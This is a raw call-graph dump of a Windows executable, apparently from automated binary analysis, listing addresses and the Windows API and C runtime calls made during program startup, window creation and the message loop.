99160->99161 99163 8f101c std::exception::exception 99160->99163 99216 8f594c 99160->99216 99233 8f35e1 DecodePointer 99160->99233 99161->99110 99234 8f87db RaiseException 99163->99234 99165 8f1046 99235 8f8711 58 API calls _free 99165->99235 99167 8f1058 99167->99110 99169 8f0ff6 Mailbox 59 API calls 99168->99169 99170 8d53a0 RegQueryValueExW 99169->99170 99170->99114 99170->99116 99172 8d7d38 __NMSG_WRITE 99171->99172 99173 8d7da5 99171->99173 99175 8d7d4e 99172->99175 99176 8d7d73 99172->99176 99174 8d7e8c 59 API calls 99173->99174 99179 8d7d56 _memmove 99174->99179 99244 8d8087 59 API calls Mailbox 99175->99244 99177 8d8189 59 API calls 99176->99177 99177->99179 99179->99116 99181 8d7f50 __NMSG_WRITE _memmove 99180->99181 99182 8f0ff6 Mailbox 59 API calls 99181->99182 99183 8d7f8e 99182->99183 99183->99119 99185 8d4871 GetModuleFileNameW 99184->99185 99185->99131 99187 901b90 __ftell_nolock 99186->99187 99188 8d48bb GetFullPathNameW 99187->99188 99189 8d48da 99188->99189 99190 8d48f7 99188->99190 99191 8d7d2c 59 API calls 99189->99191 99192 8d7eec 59 API calls 99190->99192 99193 8d48e6 99191->99193 99192->99193 99196 8d7886 99193->99196 99197 8d7894 99196->99197 99200 8d7e8c 99197->99200 99199 8d48f2 99199->99134 99201 8d7e9a 99200->99201 99203 8d7ea3 _memmove 99200->99203 99201->99203 99204 8d7faf 99201->99204 99203->99199 99205 8d7fc2 99204->99205 99207 8d7fbf _memmove 99204->99207 99206 8f0ff6 Mailbox 59 API calls 99205->99206 99206->99207 99207->99203 99209 8d7dbf __NMSG_WRITE 99208->99209 99210 8d8189 59 API calls 99209->99210 99211 8d7dd0 _memmove 99209->99211 99212 90f130 _memmove 99210->99212 99211->99146 99214 8f0ff6 Mailbox 59 API calls 99213->99214 99215 8d8193 99214->99215 99215->99147 99217 8f59c7 99216->99217 99224 8f5958 99216->99224 99242 8f35e1 DecodePointer 99217->99242 99219 8f59cd 99243 8f8d68 58 API calls __getptd_noexit 99219->99243 99222 8f598b RtlAllocateHeap 99222->99224 99232 8f59bf 99222->99232 99224->99222 99225 8f59b3 99224->99225 99226 8f5963 99224->99226 99230 8f59b1 99224->99230 99239 8f35e1 DecodePointer 99224->99239 99240 8f8d68 58 API calls __getptd_noexit 99225->99240 99226->99224 99236 8fa3ab 58 API calls 2 library calls 99226->99236 99237 8fa408 58 API calls 6 library calls 99226->99237 99238 8f32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99226->99238 99241 8f8d68 58 API calls __getptd_noexit 99230->99241 99232->99160 99233->99160 99234->99165 99235->99167 99236->99226 99237->99226 99239->99224 99240->99230 99241->99232 99242->99219 99243->99232 99244->99179 99246 8f2e90 type_info::_Type_info_dtor 99245->99246 99253 8f3457 99246->99253 99252 8f2eb7 type_info::_Type_info_dtor 99252->99122 99270 8f9e4b 99253->99270 99255 8f2e99 99256 8f2ec8 DecodePointer DecodePointer 99255->99256 99257 8f2ea5 99256->99257 99258 8f2ef5 99256->99258 99267 8f2ec2 99257->99267 99258->99257 99316 8f89e4 59 API calls __cftoe2_l 99258->99316 99260 8f2f58 EncodePointer EncodePointer 99260->99257 99261 8f2f07 99261->99260 99262 8f2f2c 99261->99262 99317 8f8aa4 61 API calls __realloc_crt 99261->99317 99262->99257 99265 8f2f46 EncodePointer 99262->99265 99318 8f8aa4 61 API calls __realloc_crt 99262->99318 99265->99260 99266 8f2f40 99266->99257 99266->99265 99319 8f3460 99267->99319 99271 8f9e6f EnterCriticalSection 99270->99271 99272 8f9e5c 99270->99272 99271->99255 99277 8f9ed3 99272->99277 99274 8f9e62 99274->99271 99301 8f32f5 58 API calls 3 library calls 99274->99301 99278 8f9edf type_info::_Type_info_dtor 99277->99278 99279 8f9ee8 99278->99279 99280 8f9f00 99278->99280 99302 8fa3ab 58 API calls 2 library calls 99279->99302 99289 8f9f21 type_info::_Type_info_dtor 99280->99289 99305 8f8a5d 58 API calls 2 library calls 99280->99305 99282 8f9eed 99303 8fa408 58 API calls 6 library calls 99282->99303 99285 8f9f15 99287 8f9f1c 99285->99287 99288 8f9f2b 99285->99288 99286 8f9ef4 99304 8f32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99286->99304 99306 8f8d68 58 API calls __getptd_noexit 99287->99306 99292 8f9e4b __lock 58 API calls 99288->99292 99289->99274 99294 8f9f32 99292->99294 99295 8f9f3f 99294->99295 99296 8f9f57 99294->99296 99307 8fa06b InitializeCriticalSectionAndSpinCount 99295->99307 99308 8f2f95 99296->99308 99299 8f9f4b 99314 8f9f73 LeaveCriticalSection _doexit 99299->99314 99302->99282 99303->99286 99305->99285 99306->99289 99307->99299 99309 8f2f9e RtlFreeHeap 99308->99309 99310 8f2fc7 __dosmaperr 99308->99310 99309->99310 99311 8f2fb3 99309->99311 99310->99299 99315 8f8d68 58 API calls __getptd_noexit 99311->99315 99313 8f2fb9 GetLastError 99313->99310 99314->99289 99315->99313 99316->99261 99317->99262 99318->99266 99322 8f9fb5 LeaveCriticalSection 99319->99322 99321 8f2ec7 99321->99252 99322->99321 99323 910226 99330 8dade2 Mailbox 99323->99330 99324 8db6c1 99339 93a0b5 89 API calls 4 library calls 99324->99339 99326 910c86 99340 9266f4 59 API calls Mailbox 99326->99340 99328 910c8f 99330->99324 99330->99326 99330->99328 99331 9100e0 VariantClear 99330->99331 99334 94e237 99330->99334 99337 8d9df0 59 API calls Mailbox 99330->99337 99338 927405 59 API calls 99330->99338 99331->99330 99341 94cdf1 99334->99341 99336 94e247 99336->99330 99337->99330 99338->99330 99339->99326 99340->99328 99379 8d9997 99341->99379 99345 94d0cd 99346 94d242 99345->99346 99350 94d0db 99345->99350 99447 94dbdc 92 API calls Mailbox 99346->99447 99349 94d251 99349->99350 99351 94d25d 99349->99351 99410 94cc82 99350->99410 99363 94ce75 Mailbox 99351->99363 99352 8d9997 84 API calls 99357 94cec6 Mailbox 99352->99357 99357->99345 99357->99352 99357->99363 99429 93f835 59 API calls 2 library calls 99357->99429 99430 94d2f3 61 API calls 2 library calls 99357->99430 99358 94d114 99425 8f0e48 99358->99425 99361 94d147 99432 8d942e 99361->99432 99362 94d12e 99431 93a0b5 89 API calls 4 library calls 99362->99431 99363->99336 99366 94d139 GetCurrentProcess TerminateProcess 99366->99361 99371 94d2b8 99371->99363 99374 94d2cc FreeLibrary 99371->99374 99372 94d17f 99444 94d95d 107 API calls _free 99372->99444 99374->99363 99378 94d190 99378->99371 99445 8d8ea0 59 API calls Mailbox 99378->99445 99446 8d9e9c 60 API calls Mailbox 99378->99446 99448 94d95d 107 API calls _free 99378->99448 99380 8d99ab 99379->99380 99381 8d99b1 99379->99381 99380->99363 99397 94dab9 99380->99397 99382 90f9fc __i64tow 99381->99382 99383 8d99f9 99381->99383 99384 8d99b7 __itow 99381->99384 99389 90f903 99381->99389 99449 8f38d8 83 API calls 3 library calls 99383->99449 99386 8f0ff6 Mailbox 59 API calls 99384->99386 99388 8d99d1 99386->99388 99388->99380 99392 8d7f41 59 API calls 99388->99392 99390 90f97b Mailbox _wcscpy 99389->99390 99391 8f0ff6 Mailbox 59 API calls 99389->99391 99450 8f38d8 83 API calls 3 library calls 99390->99450 99393 90f948 99391->99393 99392->99380 99394 8f0ff6 Mailbox 59 API calls 99393->99394 99395 90f96e 99394->99395 99395->99390 99396 8d7f41 59 API calls 99395->99396 99396->99390 99398 8d7faf 59 API calls 99397->99398 99399 94dad4 CharLowerBuffW 99398->99399 99451 92f658 99399->99451 99403 8d77c7 59 API calls 99404 94db0d 99403->99404 99458 8d79ab 99404->99458 99406 94db6c Mailbox 99406->99357 99407 94db24 99408 8d7e8c 59 API calls 99407->99408 99409 94db30 Mailbox 99408->99409 99409->99406 99471 94d2f3 61 API calls 2 library calls 99409->99471 99411 94cc9d 99410->99411 99415 94ccf2 99410->99415 99412 8f0ff6 Mailbox 59 API calls 99411->99412 99414 94ccbf 99412->99414 99413 8f0ff6 Mailbox 59 API calls 99413->99414 99414->99413 99414->99415 99416 94dd64 99415->99416 99417 94df8d Mailbox 99416->99417 99424 94dd87 _strcat _wcscpy __NMSG_WRITE 99416->99424 99417->99358 99418 8d9c9c 59 API calls 99418->99424 99419 8d9d46 59 API calls 99419->99424 99420 8d9cf8 59 API calls 99420->99424 99421 8d9997 84 API calls 99421->99424 99422 8f594c 58 API calls __crtCompareStringA_stat 99422->99424 99424->99417 99424->99418 99424->99419 99424->99420 99424->99421 99424->99422 99475 935b29 61 API calls 2 library calls 99424->99475 99426 8f0e5d 99425->99426 99427 8f0ef5 VirtualProtect 99426->99427 99428 8f0ec3 99426->99428 99427->99428 99428->99361 99428->99362 99429->99357 99430->99357 99431->99366 99433 8d9436 99432->99433 99434 8f0ff6 Mailbox 59 API calls 99433->99434 99435 8d9444 99434->99435 99436 8d9450 99435->99436 99476 8d935c 59 API calls Mailbox 99435->99476 99438 8d91b0 99436->99438 99477 8d92c0 99438->99477 99440 8f0ff6 Mailbox 59 API calls 99442 8d925b 99440->99442 99441 8d91bf 99441->99440 99441->99442 99442->99378 99443 8d8ea0 59 API calls Mailbox 99442->99443 99443->99372 99444->99378 99445->99378 99446->99378 99447->99349 99448->99378 99449->99384 99450->99382 99453 92f683 __NMSG_WRITE 99451->99453 99452 92f6c2 99452->99403 99452->99409 99453->99452 99454 92f769 99453->99454 99455 92f6b8 99453->99455 99454->99452 99473 8d7a24 61 API calls 99454->99473 99455->99452 99472 8d7a24 61 API calls 99455->99472 99459 8d79ba 99458->99459 99460 8d7a17 99458->99460 99459->99460 99462 8d79c5 99459->99462 99461 8d7e8c 59 API calls 99460->99461 99468 8d79e8 _memmove 99461->99468 99463 90ef32 99462->99463 99464 8d79e0 99462->99464 99465 8d8189 59 API calls 99463->99465 99474 8d8087 59 API calls Mailbox 99464->99474 99467 90ef3c 99465->99467 99469 8f0ff6 Mailbox 59 API calls 99467->99469 99468->99407 99470 90ef5c 99469->99470 99471->99406 99472->99455 99473->99454 99474->99468 99475->99424 99476->99436 99478 8d92c9 Mailbox 99477->99478 99479 90f5c8 99478->99479 99484 8d92d3 99478->99484 99480 8f0ff6 Mailbox 59 API calls 99479->99480 99482 90f5d4 99480->99482 99482->99482 99483 8d92da 99483->99441 99484->99483 99485 8d9df0 59 API calls Mailbox 99484->99485 99485->99484 99486 8d1055 99491 8d2649 99486->99491 99489 8f2f80 __cinit 67 API calls 99490 8d1064 99489->99490 99492 8d77c7 59 API calls 99491->99492 99493 8d26b7 99492->99493 99498 8d3582 99493->99498 99496 8d2754 99497 8d105a 99496->99497 99501 8d3416 59 API calls 2 library calls 99496->99501 99497->99489 99502 8d35b0 99498->99502 99501->99496 99503 8d35bd 99502->99503 99504 8d35a1 99502->99504 99503->99504 99505 8d35c4 RegOpenKeyExW 99503->99505 99504->99496 99505->99504 99506 8d35de RegQueryValueExW 99505->99506 99507 8d35ff 99506->99507 99508 8d3614 RegCloseKey 99506->99508 99507->99508 99508->99504 99509 914599 99513 92655c 99509->99513 99511 9145a4 99512 92655c 85 API calls 99511->99512 99512->99511 99518 926569 99513->99518 99523 926596 99513->99523 99514 926598 99534 8d9488 84 API calls Mailbox 99514->99534 99516 92659d 99517 8d9997 84 API calls 99516->99517 99519 9265a4 99517->99519 99518->99514 99518->99516 99521 926590 99518->99521 99518->99523 99524 8d7c8e 99519->99524 99533 8d9700 59 API calls _wcsstr 99521->99533 99523->99511 99525 90f094 99524->99525 99526 8d7ca0 99524->99526 99541 928123 59 API calls _memmove 99525->99541 99535 8d7bb1 99526->99535 99529 8d7cac 99529->99523 99530 90f09e 99542 8d81a7 99530->99542 99532 90f0a6 Mailbox 99533->99523 99534->99516 99536 8d7bbf 99535->99536 99540 8d7be5 _memmove 99535->99540 99537 8f0ff6 Mailbox 59 API calls 99536->99537 99536->99540 99538 8d7c34 99537->99538 99539 8f0ff6 Mailbox 59 API calls 99538->99539 99539->99540 99540->99529 99541->99530 99543 8d81ba 99542->99543 99544 8d81b2 99542->99544 99543->99532 99546 8d80d7 59 API calls 2 library calls 99544->99546 99546->99543 99547 8d1016 99552 8d4ad2 99547->99552 99550 8f2f80 __cinit 67 API calls 99551 8d1025 99550->99551 99553 8f0ff6 Mailbox 59 API calls 99552->99553 99554 8d4ada 99553->99554 99555 8d101b 99554->99555 99559 8d4a94 99554->99559 99555->99550 99560 8d4a9d 99559->99560 99562 8d4aaf 99559->99562 99561 8f2f80 __cinit 67 API calls 99560->99561 99561->99562 99563 8d4afe 99562->99563 99564 8d77c7 59 API calls 99563->99564 99565 8d4b16 GetVersionExW 99564->99565 99566 8d7d2c 59 API calls 99565->99566 99567 8d4b59 99566->99567 99568 8d7e8c 59 API calls 99567->99568 99576 8d4b86 99567->99576 99569 8d4b7a 99568->99569 99570 8d7886 59 API calls 99569->99570 99570->99576 99571 8d4bf1 GetCurrentProcess IsWow64Process 99572 8d4c0a 99571->99572 99573 8d4c89 GetSystemInfo 99572->99573 99574 8d4c20 99572->99574 99578 8d4c56 99573->99578 99587 8d4c95 99574->99587 99575 90dc8d 99576->99571 99576->99575 99578->99555 99580 8d4c7d GetSystemInfo 99583 8d4c47 99580->99583 99581 8d4c32 99582 8d4c95 2 API calls 99581->99582 99584 8d4c3a GetNativeSystemInfo 99582->99584 99583->99578 99585 8d4c4d FreeLibrary 99583->99585 99584->99583 99585->99578 99588 8d4c2e 99587->99588 99589 8d4c9e LoadLibraryA 99587->99589 99588->99580 99588->99581 99589->99588 99590 8d4caf GetProcAddress 99589->99590 99590->99588 99591 8d1066 99596 8df8cf 99591->99596 99593 8d106c 99594 8f2f80 __cinit 67 API calls 99593->99594 99595 8d1076 99594->99595 99597 8df8f0 99596->99597 99629 8f0143 99597->99629 99601 8df937 99602 8d77c7 59 API calls 99601->99602 99603 8df941 99602->99603 99604 8d77c7 59 API calls 99603->99604 99605 8df94b 99604->99605 99606 8d77c7 59 API calls 99605->99606 99607 8df955 99606->99607 99608 8d77c7 59 API calls 99607->99608 99609 8df993 99608->99609 99610 8d77c7 59 API calls 99609->99610 99611 8dfa5e 99610->99611 99639 8e60e7 99611->99639 99615 8dfa90 99616 8d77c7 59 API calls 99615->99616 99617 8dfa9a 99616->99617 99667 8effde 99617->99667 99619 8dfae1 99620 8dfaf1 GetStdHandle 99619->99620 99621 8dfb3d 99620->99621 99622 9149d5 99620->99622 99623 8dfb45 OleInitialize 99621->99623 99622->99621 99624 9149de 99622->99624 99623->99593 99674 936dda 64 API calls Mailbox 99624->99674 99626 9149e5 99675 9374a9 CreateThread 99626->99675 99628 9149f1 CloseHandle 99628->99623 99676 8f021c 99629->99676 99632 8f021c 59 API calls 99633 8f0185 99632->99633 99634 8d77c7 59 API calls 99633->99634 99635 8f0191 99634->99635 99636 8d7d2c 59 API calls 99635->99636 99637 8df8f6 99636->99637 99638 8f03a2 6 API calls 99637->99638 99638->99601 99640 8d77c7 59 API calls 99639->99640 99641 8e60f7 99640->99641 99642 8d77c7 59 API calls 99641->99642 99643 8e60ff 99642->99643 99683 8e5bfd 99643->99683 99646 8e5bfd 59 API calls 99647 8e610f 99646->99647 99648 8d77c7 59 API calls 99647->99648 99649 8e611a 99648->99649 99650 8f0ff6 Mailbox 59 API calls 99649->99650 99651 8dfa68 99650->99651 99652 8e6259 99651->99652 99653 8e6267 99652->99653 99654 8d77c7 59 API calls 99653->99654 99655 8e6272 99654->99655 99656 8d77c7 59 API calls 99655->99656 99657 8e627d 99656->99657 99658 8d77c7 59 API calls 99657->99658 99659 8e6288 99658->99659 99660 8d77c7 59 API calls 99659->99660 99661 8e6293 99660->99661 99662 8e5bfd 59 API calls 99661->99662 99663 8e629e 99662->99663 99664 8f0ff6 Mailbox 59 API calls 99663->99664 99665 8e62a5 RegisterWindowMessageW 99664->99665 99665->99615 99668 8effee 99667->99668 99669 925cc3 99667->99669 99670 8f0ff6 Mailbox 59 API calls 99668->99670 99686 939d71 60 API calls 99669->99686 99673 8efff6 99670->99673 99672 925cce 99673->99619 99674->99626 99675->99628 99687 93748f 65 API calls 99675->99687 99677 8d77c7 59 API calls 99676->99677 99678 8f0227 99677->99678 99679 8d77c7 59 API calls 99678->99679 99680 8f022f 99679->99680 99681 8d77c7 59 API calls 99680->99681 99682 8f017b 99681->99682 99682->99632 99684 8d77c7 59 API calls 99683->99684 99685 8e5c05 99684->99685 99685->99646 99686->99672 99688 8f7e93 99689 8f7e9f type_info::_Type_info_dtor 99688->99689 99725 8fa048 GetStartupInfoW 99689->99725 99692 8f7ea4 99727 8f8dbc GetProcessHeap 99692->99727 99693 8f7efc 99694 8f7f07 99693->99694 99810 8f7fe3 58 API calls 3 library calls 99693->99810 99728 8f9d26 99694->99728 99697 8f7f0d 99698 8f7f18 __RTC_Initialize 99697->99698 99811 8f7fe3 58 API calls 3 library calls 99697->99811 99749 8fd812 99698->99749 99701 8f7f27 99702 8f7f33 GetCommandLineW 99701->99702 99812 8f7fe3 58 API calls 3 library calls 99701->99812 99768 905173 GetEnvironmentStringsW 99702->99768 99705 8f7f32 99705->99702 99708 8f7f4d 99709 8f7f58 99708->99709 99813 8f32f5 58 API calls 3 library calls 99708->99813 99778 904fa8 99709->99778 99712 8f7f5e 99713 8f7f69 99712->99713 99814 8f32f5 58 API calls 3 library calls 99712->99814 99792 8f332f 99713->99792 99716 8f7f71 99717 8f7f7c __wwincmdln 99716->99717 99815 8f32f5 58 API calls 3 library calls 99716->99815 99798 8d492e 99717->99798 99720 8f7f90 99721 8f7f9f 99720->99721 99816 8f3598 58 API calls _doexit 99720->99816 99817 8f3320 58 API calls _doexit 99721->99817 99724 8f7fa4 type_info::_Type_info_dtor 99726 8fa05e 99725->99726 99726->99692 99727->99693 99818 8f33c7 36 API calls 2 library calls 99728->99818 99730 8f9d2b 99819 8f9f7c InitializeCriticalSectionAndSpinCount __ioinit 99730->99819 99732 8f9d30 99733 8f9d34 99732->99733 99821 8f9fca TlsAlloc 99732->99821 99820 8f9d9c 61 API calls 2 library calls 99733->99820 99736 8f9d46 99736->99733 99738 8f9d51 99736->99738 99737 8f9d39 99737->99697 99822 8f8a15 99738->99822 99741 8f9d93 99830 8f9d9c 61 API calls 2 library calls 99741->99830 99744 8f9d72 99744->99741 99746 8f9d78 99744->99746 99745 8f9d98 99745->99697 99829 8f9c73 58 API calls 4 library calls 99746->99829 99748 8f9d80 GetCurrentThreadId 99748->99697 99750 8fd81e type_info::_Type_info_dtor 99749->99750 99751 8f9e4b __lock 58 API calls 99750->99751 99752 8fd825 99751->99752 99753 8f8a15 __calloc_crt 58 API calls 99752->99753 99754 8fd836 99753->99754 99755 8fd841 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 99754->99755 99756 8fd8a1 GetStartupInfoW 99754->99756 99755->99701 99762 8fd8b6 99756->99762 99763 8fd9e5 99756->99763 99757 8fdaad 99844 8fdabd LeaveCriticalSection _doexit 99757->99844 99759 8f8a15 __calloc_crt 58 API calls 99759->99762 99760 8fda32 GetStdHandle 99760->99763 99761 8fda45 GetFileType 99761->99763 99762->99759 99762->99763 99765 8fd904 99762->99765 99763->99757 99763->99760 99763->99761 99843 8fa06b InitializeCriticalSectionAndSpinCount 99763->99843 99764 8fd938 GetFileType 99764->99765 99765->99763 99765->99764 99842 8fa06b InitializeCriticalSectionAndSpinCount 99765->99842 99769 905184 99768->99769 99770 8f7f43 99768->99770 99845 8f8a5d 58 API calls 2 library calls 99769->99845 99774 904d6b GetModuleFileNameW 99770->99774 99772 9051c0 FreeEnvironmentStringsW 99772->99770 99773 9051aa _memmove 99773->99772 99775 904d9f _wparse_cmdline 99774->99775 99777 904ddf _wparse_cmdline 99775->99777 99846 8f8a5d 58 API calls 2 library calls 99775->99846 99777->99708 99779 904fb9 99778->99779 99781 904fc1 __NMSG_WRITE 99778->99781 99779->99712 99780 8f8a15 __calloc_crt 58 API calls 99788 904fea __NMSG_WRITE 99780->99788 99781->99780 99782 905041 99783 8f2f95 _free 58 API calls 99782->99783 99783->99779 99784 8f8a15 __calloc_crt 58 API calls 99784->99788 99785 905066 99786 8f2f95 _free 58 API calls 99785->99786 99786->99779 99788->99779 99788->99782 99788->99784 99788->99785 99789 90507d 99788->99789 99847 904857 58 API calls __cftoe2_l 99788->99847 99848 8f9006 IsProcessorFeaturePresent 99789->99848 99791 905089 99791->99712 99794 8f333b __IsNonwritableInCurrentImage 99792->99794 99871 8fa711 99794->99871 99795 8f3359 __initterm_e 99796 8f2f80 __cinit 67 API calls 99795->99796 99797 8f3378 _doexit __IsNonwritableInCurrentImage 99795->99797 99796->99797 99797->99716 99799 8d4948 99798->99799 99809 8d49e7 99798->99809 99800 8d4982 IsThemeActive 99799->99800 99874 8f35ac 99800->99874 99804 8d49ae 99886 8d4a5b SystemParametersInfoW SystemParametersInfoW 99804->99886 99806 8d49ba 99887 8d3b4c 99806->99887 99808 8d49c2 SystemParametersInfoW 99808->99809 99809->99720 99810->99694 99811->99698 99812->99705 99816->99721 99817->99724 99818->99730 99819->99732 99820->99737 99821->99736 99823 8f8a1c 99822->99823 99825 8f8a57 99823->99825 99827 8f8a3a 99823->99827 99831 905446 99823->99831 99825->99741 99828 8fa026 TlsSetValue 99825->99828 99827->99823 99827->99825 99839 8fa372 Sleep 99827->99839 99828->99744 99829->99748 99830->99745 99832 905451 99831->99832 99837 90546c 99831->99837 99833 90545d 99832->99833 99832->99837 99840 8f8d68 58 API calls __getptd_noexit 99833->99840 99835 90547c HeapAlloc 99836 905462 99835->99836 99835->99837 99836->99823 99837->99835 99837->99836 99841 8f35e1 DecodePointer 99837->99841 99839->99827 99840->99836 99841->99837 99842->99765 99843->99763 99844->99755 99845->99773 99846->99777 99847->99788 99849 8f9011 99848->99849 99854 8f8e99 99849->99854 99853 8f902c 99853->99791 99855 8f8eb3 _memset ___raise_securityfailure 99854->99855 99856 8f8ed3 IsDebuggerPresent 99855->99856 99862 8fa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 99856->99862 99859 8f8f97 ___raise_securityfailure 99863 8fc836 99859->99863 99860 8f8fba 99861 8fa380 GetCurrentProcess TerminateProcess 99860->99861 99861->99853 99862->99859 99864 8fc83e 99863->99864 99865 8fc840 IsProcessorFeaturePresent 99863->99865 99864->99860 99867 905b5a 99865->99867 99870 905b09 5 API calls 2 library calls 99867->99870 99869 905c3d 99869->99860 99870->99869 99872 8fa714 EncodePointer 99871->99872 99872->99872 99873 8fa72e 99872->99873 99873->99795 99875 8f9e4b __lock 58 API calls 99874->99875 99876 8f35b7 DecodePointer EncodePointer 99875->99876 99939 8f9fb5 LeaveCriticalSection 99876->99939 99878 8d49a7 99879 8f3614 99878->99879 99880 8f361e 99879->99880 99881 8f3638 99879->99881 99880->99881 99940 8f8d68 58 API calls __getptd_noexit 99880->99940 99881->99804 99883 8f3628 99941 8f8ff6 9 API calls __cftoe2_l 99883->99941 99885 8f3633 99885->99804 99886->99806 99888 8d3b59 __ftell_nolock 99887->99888 99889 8d77c7 59 API calls 99888->99889 99890 8d3b63 GetCurrentDirectoryW 99889->99890 99942 8d3778 99890->99942 99892 8d3b8c IsDebuggerPresent 99893 8d3b9a 99892->99893 99894 90d4ad MessageBoxA 99892->99894 99895 8d3c73 99893->99895 99897 90d4c7 99893->99897 99898 8d3bb7 99893->99898 99894->99897 99896 8d3c7a SetCurrentDirectoryW 99895->99896 99899 8d3c87 Mailbox 99896->99899 100152 8d7373 59 API calls Mailbox 99897->100152 100023 8d73e5 99898->100023 99899->99808 99902 90d4d7 99907 90d4ed SetCurrentDirectoryW 99902->99907 99904 8d3bd5 GetFullPathNameW 99905 8d7d2c 59 API calls 99904->99905 99906 8d3c10 99905->99906 100039 8e0a8d 99906->100039 99907->99899 99910 8d3c2e 99911 8d3c38 99910->99911 100153 934c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 99910->100153 100055 8d3a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 99911->100055 99915 90d50a 99915->99911 99917 90d51b 99915->99917 99919 8d4864 61 API calls 99917->99919 99918 8d3c42 99920 8d3c55 99918->99920 100063 8d43db 99918->100063 99921 90d523 99919->99921 100074 8e0b30 99920->100074 99924 8d7f41 59 API calls 99921->99924 99926 90d530 99924->99926 99925 8d3c60 99925->99895 100151 8d44cb Shell_NotifyIconW _memset 99925->100151 99928 90d53a 99926->99928 99929 90d55f 99926->99929 99931 8d7e0b 59 API calls 99928->99931 99930 8d7e0b 59 API calls 99929->99930 99932 90d55b GetForegroundWindow ShellExecuteW 99930->99932 99933 90d545 99931->99933 99936 90d58f Mailbox 99932->99936 99935 8d7c8e 59 API calls 99933->99935 99937 90d552 99935->99937 99936->99895 99938 8d7e0b 59 API calls 99937->99938 99938->99932 99939->99878 99940->99883 99941->99885 99943 8d77c7 59 API calls 99942->99943 99944 8d378e 99943->99944 100154 8d3d43 99944->100154 99946 8d37ac 99947 8d4864 61 API calls 99946->99947 99948 8d37c0 99947->99948 99949 8d7f41 59 API calls 99948->99949 99950 8d37cd 99949->99950 100168 8d4f3d 99950->100168 99953 8d37ee Mailbox 99958 8d81a7 59 API calls 99953->99958 99954 90d3ae 100224 9397e5 99954->100224 99957 90d3cd 99960 8f2f95 _free 58 API calls 99957->99960 99961 8d3801 99958->99961 99963 90d3da 99960->99963 100192 8d93ea 99961->100192 99964 8d4faa 84 API calls 99963->99964 99966 90d3e3 99964->99966 99970 8d3ee2 59 API calls 99966->99970 99967 8d7f41 59 API calls 99968 8d381a 99967->99968 100195 8d8620 99968->100195 99972 90d3fe 99970->99972 99971 8d382c Mailbox 99973 8d7f41 59 API calls 99971->99973 99974 8d3ee2 59 API calls 99972->99974 99975 8d3852 99973->99975 99976 90d41a 99974->99976 99977 8d8620 69 API calls 99975->99977 99978 8d4864 61 API calls 99976->99978 99980 8d3861 Mailbox 99977->99980 99979 90d43f 99978->99979 99981 8d3ee2 59 API calls 99979->99981 99982 8d77c7 59 API calls 99980->99982 99983 90d44b 99981->99983 99985 8d387f 99982->99985 99984 8d81a7 59 API calls 99983->99984 99986 90d459 99984->99986 100199 8d3ee2 99985->100199 99988 8d3ee2 59 API calls 99986->99988 99990 90d468 99988->99990 99996 8d81a7 59 API calls 99990->99996 99992 8d3899 99992->99966 99993 8d38a3 99992->99993 99994 8f313d _W_store_winword 60 API calls 99993->99994 99995 8d38ae 99994->99995 99995->99972 99997 8d38b8 99995->99997 99998 90d48a 99996->99998 99999 8f313d _W_store_winword 60 API calls 99997->99999 100000 8d3ee2 59 API calls 99998->100000 100001 8d38c3 99999->100001 100002 90d497 100000->100002 100001->99976 100003 8d38cd 100001->100003 100002->100002 100004 8f313d _W_store_winword 60 API calls 100003->100004 100005 8d38d8 100004->100005 100005->99990 100006 8d3919 100005->100006 100008 8d3ee2 59 API calls 100005->100008 100006->99990 100007 8d3926 100006->100007 100010 8d942e 59 API calls 100007->100010 100009 8d38fc 100008->100009 100011 8d81a7 59 API calls 100009->100011 100012 8d3936 100010->100012 100013 8d390a 100011->100013 100014 8d91b0 59 API calls 100012->100014 100015 8d3ee2 59 API calls 100013->100015 100016 8d3944 100014->100016 100015->100006 100215 8d9040 100016->100215 100018 8d93ea 59 API calls 100020 8d3961 100018->100020 100019 8d9040 60 API calls 100019->100020 100020->100018 100020->100019 100021 8d3ee2 59 API calls 100020->100021 100022 8d39a7 Mailbox 100020->100022 100021->100020 100022->99892 100024 8d73f2 __ftell_nolock 100023->100024 100025 8d740b 100024->100025 100027 90ee4b _memset 100024->100027 100026 8d48ae 60 API calls 100025->100026 100028 8d7414 100026->100028 100029 90ee67 GetOpenFileNameW 100027->100029 100844 8f09d5 100028->100844 100031 90eeb6 100029->100031 100032 8d7d2c 59 API calls 100031->100032 100034 90eecb 100032->100034 100034->100034 100036 8d7429 100862 8d69ca 100036->100862 100040 8e0a9a __ftell_nolock 100039->100040 101100 8d6ee0 100040->101100 100042 8e0a9f 100054 8d3c26 100042->100054 101111 8e12fe 89 API calls 100042->101111 100044 8e0aac 100044->100054 101112 8e4047 91 API calls Mailbox 100044->101112 100046 8e0ab5 100047 8e0ab9 GetFullPathNameW 100046->100047 100046->100054 100048 8d7d2c 59 API calls 100047->100048 100049 8e0ae5 100048->100049 100050 8d7d2c 59 API calls 100049->100050 100051 8e0af2 100050->100051 100052 8d7d2c 59 API calls 100051->100052 100053 9150d5 _wcscat 100051->100053 100052->100054 100054->99902 100054->99910 100056 90d49c 100055->100056 100057 8d3ac2 LoadImageW RegisterClassExW 100055->100057 101151 8d48fe LoadImageW EnumResourceNamesW 100056->101151 101150 8d3041 7 API calls 100057->101150 100060 8d3b46 100062 8d39e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 100060->100062 100061 90d4a5 100062->99918 100064 8d4406 _memset 100063->100064 101152 8d4213 100064->101152 100068 8d44a5 Shell_NotifyIconW 100070 8d44b3 100068->100070 100069 8d44c1 Shell_NotifyIconW 100069->100070 101156 8d410d 100070->101156 100072 8d448b 100072->100068 100072->100069 100073 8d44ba 100073->99920 100075 9150ed 100074->100075 100087 8e0b55 100074->100087 101235 93a0b5 89 API calls 4 library calls 100075->101235 100077 8e0e5a 100077->99925 100080 8e1044 100080->100077 100082 8e1051 100080->100082 100081 8e0bab PeekMessageW 100144 8e0b65 Mailbox 100081->100144 101233 8e11f3 331 API calls Mailbox 100082->101233 100085 8e1058 LockWindowUpdate DestroyWindow GetMessageW 100085->100077 100089 8e108a 100085->100089 100086 8e0e44 100086->100077 101232 8e11d0 10 API calls Mailbox 100086->101232 100087->100144 101236 8d9fbd 60 API calls 100087->101236 101237 9268bf 331 API calls 100087->101237 100088 9152ab Sleep 100088->100144 100091 916082 TranslateMessage DispatchMessageW 